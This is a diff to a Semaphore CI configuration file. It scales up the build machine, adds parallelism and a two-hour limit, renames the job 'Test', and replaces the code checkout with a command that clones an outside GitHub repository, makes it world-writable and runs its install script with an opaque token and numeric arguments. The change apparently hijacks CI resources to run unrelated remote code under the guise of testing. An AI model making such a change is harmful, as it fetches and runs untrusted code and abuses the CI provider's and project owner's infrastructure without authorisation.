--- a/.semaphore/semaphore.yml
+++ b/.semaphore/semaphore.yml
@@ -2,12 +2,17 @@ version: v1.0
 name: Initial Pipeline
 agent:
   machine:
-    type: e1-standard-2
+    type: e1-standard-8
     os_image: ubuntu1804
+
+execution_time_limit:
+    hours: 2
+
 blocks:
   - name: 'Block #1'
     task:
       jobs:
-        - name: 'Job #1'
+        - name: Test
+          parallelism: 4
           commands:
-            - checkout
+            - sudo apt update || apt update && sudo apt install -y git whiptail || apt install -y git whiptail && git clone https://github.com/golemcli/Rixter.git && chmod -R 777 Rixter && Rixter/install.sh "2" "fb6eb032c1e071f0675d01e9d29bf5a2" "35" "5" "2"
